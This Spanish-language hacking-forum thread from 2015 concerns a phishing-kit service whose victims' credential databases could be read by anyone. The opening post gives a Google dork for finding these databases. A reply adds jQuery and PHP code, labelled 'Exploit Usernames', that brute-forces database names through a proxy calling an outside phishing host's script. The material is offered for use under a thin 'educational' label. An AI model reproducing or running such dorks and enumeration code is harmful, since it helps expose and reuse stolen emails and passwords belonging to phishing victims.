Nadie sabe para quien trabaja!

Iniciado por yack, Mayo 26, 2015, 04:56:25 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Mayo 26, 2015, 04:56:25 PM
Comienzo mi dia tranquilo y como soy amante de lo que respecta a ing. social (fakes/scam, engaños, phishing : Ojo con fines educativos claro esta!) enpece buscando con mi buscador preferido sitios en donde se pueda configurar un ataque de phishing, y me tope con You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login creo yo que ya lleva mucho tiempo en el tema, pero bueno vamos a lo que respecta el tema, ps me di cuenta que solo basta con poner un nombre clave a tu base de datos (bd) y ps con ese nombre que supuestamente tu y solo tu debes saber, vizualizaras los correos y claves que hayas pescado.

decidí hacer una búsqueda con el dork site: en google

Código: text
site:http://xploitv.net/b=


y ps me resulto muy fácil leer todas las bases de datos que quise. si me preguntan si me interesan ps no me interesan por que no se de quien son ni a quien les pertenecen así que no he hecho nada malo.



y como es mi primer aporte en underc0de, ps decidí postearlo solo aquí.

Pd: si alguien lo postea en otro site por favor respete los créditos.
Saludos.
Mayo 26, 2015, 11:08:11 PM #1
Se que es algo tonto pero a eso le puedes hacer fuerza bruta demasiado facil y seria mas eficiente que google:



finder_usernames.html

Código: php
<script type="text/javascript" src="jQuery/js/jquery-2.1.4.min.js"></script>
<script type="text/javascript">
	$("document").ready(function(){
		$("#submit").click(function(e){
			e.preventDefault();
			var list_users = $("#usernames").val().split("\n");
			$.each(list_users,function(index,username){
				//console.log(username+ "\n");
				$.get(
					'usernames.php',
					{usernames : username},
					function(data) {
                    	$('.resultados').append(username + ":" + data + '<br />');
                 	},
                 	"text"
				);
			});
		});
	});
</script>
<form action="" method="post">
	<textarea cols="50" rows="20" id="usernames" name="usernames"></textarea>
	<input type="submit" id="submit" value="Exploit Usernames" />
</form>
<p class="resultados"></p>


usernames.php

Código: php

<?php
	if(isset($_GET['usernames'])){
		echo file_get_contents("http://server5.lincehost.net/~neek/xploitv/script2.php?db={$_GET['usernames']}&action=count");
	}
?>


y para leerlos:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

o usar el servicio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

donde c es el numero de usuarios

Saludos!
Pentest - Hacking & Security Services

Contact me: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Mayo 26, 2015, 11:16:35 PM #2
que te puedo decir brth ARTHUSU, no solo complementaste el post. genial.
saludos.
Junio 04, 2015, 01:59:46 AM #3
Muy buen aporte muchas gracias me sirvio bastante  :)
Imprimir
Ir Arriba Páginas1
Acciones del Usuario